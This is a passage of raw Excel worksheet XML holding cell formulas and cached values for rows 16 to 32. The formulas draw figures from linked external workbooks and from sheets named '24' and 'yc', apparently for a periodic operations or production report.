      </c>
      <c r="T16" s="209">
        <f>'[11]25'!$Y$73</f>
        <v>62.7670907618915</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]25'!$T$73</f>
        <v>93.75</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]25'!$U$73</f>
        <v>66.445</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]25'!$V$73</f>
        <v>53.3296193129062</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]25'!$Q$73</f>
        <v>22.50</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]25'!$R$73</f>
        <v>398.67</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]25'!$S$73</f>
        <v>4594.88</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'24'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'24'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]25'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]25'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]25'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]25'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]25'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]25'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]25'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]25'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]25'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'24'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'24'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]25'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]25'!$X$74</f>
        <v>217.185714285714</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]25'!$Y$74</f>
        <v>221.82678461222</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]25'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]25'!$U$74</f>
        <v>11.6666666666667</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]25'!$V$74</f>
        <v>7.33437790157846</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]25'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]25'!$R$74</f>
        <v>70</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]25'!$S$74</f>
        <v>631.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'24'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'24'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]25'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]25'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]25'!$Y$72</f>
        <v>9.15300546448087e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]25'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]25'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]25'!$V$72</f>
        <v>4.24791086350975e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]25'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]25'!$R$72</f>
        <v>2.5e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]25'!$S$72</f>
        <v>0.000366</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'24'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'24'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]25'!$W$73</f>
        <v>216.291240987865</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]25'!$X$73</f>
        <v>181.932169180596</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]25'!$Y$73</f>
        <v>237.963361438434</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]25'!$T$73</f>
        <v>100.000004166667</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]25'!$U$73</f>
        <v>22.9850041666667</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]25'!$V$73</f>
        <v>68.7052038765088</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]25'!$Q$73</f>
        <v>24.000001</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]25'!$R$73</f>
        <v>137.910025</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]25'!$S$73</f>
        <v>5919.640366</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]25'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]25'!$E$22</f>
        <v>6559</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'24'!H21</f>
        <v>183253</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2292691</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]25'!$I$22</f>
        <v>7457.36</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'24'!K21</f>
        <v>201258.01</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2267712.01</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]25'!$L$22</f>
        <v>65048.3</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>138.400638297872</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]25'!$W$81</f>
        <v>323.230769230769</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]25'!$X$81</f>
        <v>280.716035365131</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]25'!$Y$81</f>
        <v>276.005424186574</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]25'!$T$81</f>
        <v>27.0833333333333</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]25'!$U$81</f>
        <v>33.2719444444444</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]25'!$V$81</f>
        <v>35.926125812442</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]25'!$Q$81</f>
        <v>6.5</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]25'!$R$81</f>
        <v>199.631666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]25'!$S$81</f>
        <v>3095.395</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]25'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]25'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'24'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]25'!$I$17</f>
        <v>6688.78</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'24'!K22</f>
        <v>170144.66</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2061606.04</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]25'!$L$17</f>
        <v>82481.692</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>41.240846</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]25'!$W$79</f>
        <v>112.8150420056</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]25'!$X$79</f>
        <v>100.971890810601</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]25'!$Y$79</f>
        <v>102.169282991455</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]25'!$T$79</f>
        <v>8.67939814814817</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]25'!$U$79</f>
        <v>45.963287037037</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]25'!$V$79</f>
        <v>45.4194360621067</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]25'!$Q$79</f>
        <v>2.08305555555556</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]25'!$R$79</f>
        <v>275.779722222222</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]25'!$S$79</f>
        <v>3913.33861111111</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]25'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]25'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'24'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]25'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'24'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]25'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]25'!$W$80</f>
        <v>91.4</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]25'!$X$80</f>
        <v>84.2690355959751</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]25'!$Y$80</f>
        <v>79.4967609210529</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]25'!$T$80</f>
        <v>20.8333333333333</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]25'!$U$80</f>
        <v>33.5829166666667</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]25'!$V$80</f>
        <v>32.5714175177964</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]25'!$Q$80</f>
        <v>5</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]25'!$R$80</f>
        <v>201.4975</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]25'!$S$80</f>
        <v>2806.35333333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]25'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]25'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'24'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]25'!$I$56</f>
        <v>2197.78</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'24'!K24</f>
        <v>35761.88</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>315588.41</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]25'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]25'!$R$6</f>
        <v>79.8918918918919</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]25'!$S$6</f>
        <v>85.0319926873857</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]25'!$T$6</f>
        <v>86.0739436619718</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]25'!$O$6</f>
        <v>38.5416666666667</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]25'!$P$6</f>
        <v>58.3466666666667</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]25'!$Q$6</f>
        <v>52.7390900649954</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]25'!$L$6</f>
        <v>9.25</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]25'!$M$6</f>
        <v>350.08</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]25'!$N$6</f>
        <v>4544</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]25'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'24'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]25'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'24'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]25'!$R$7</f>
        <v>190.153846153846</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]25'!$S$7</f>
        <v>192.802359882006</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]25'!$T$7</f>
        <v>187.977980456624</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]25'!$O$7</f>
        <v>67.7083333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]25'!$P$7</f>
        <v>56.5</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]25'!$Q$7</f>
        <v>50.6218662952646</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]25'!$L$7</f>
        <v>16.25</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]25'!$M$7</f>
        <v>339</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]25'!$N$7</f>
        <v>4361.58</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'24'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'24'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]25'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]25'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]25'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]25'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]25'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]25'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]25'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]25'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]25'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'24'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'24'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]25'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]25'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]25'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]25'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]25'!$U$69</f>
        <v>63.6083333333333</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]25'!$V$69</f>
        <v>68.0423630454967</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]25'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]25'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]25'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'24'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'24'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]25'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]25'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]25'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]25'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]25'!$U$104</f>
        <v>38.4945</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]25'!$V$104</f>
        <v>62.5698351903435</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]25'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]25'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]25'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'24'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'24'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]25'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]25'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]25'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]25'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]25'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]25'!$V$105</f>
        <v>32.5462163416899</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]25'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]25'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]25'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'24'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'24'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]25'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]25'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]25'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]25'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]25'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]25'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]25'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]25'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]25'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]25'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]25'!$E$16</f>
        <v>4606</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'24'!H31</f>
        <v>115672</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1488679</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]25'!$I$16</f>
        <v>7211.82999999999</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'24'!K31</f>
        <v>123420.67</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1479468.8</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]25'!$L$16</f>
        <v>57680.7</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>76.9076</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'[11]25'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]25'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'24'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]25'!$I$13</f>
        <v>3373</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'24'!K32</f>
        <v>85139</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1106617</v>
      </c>
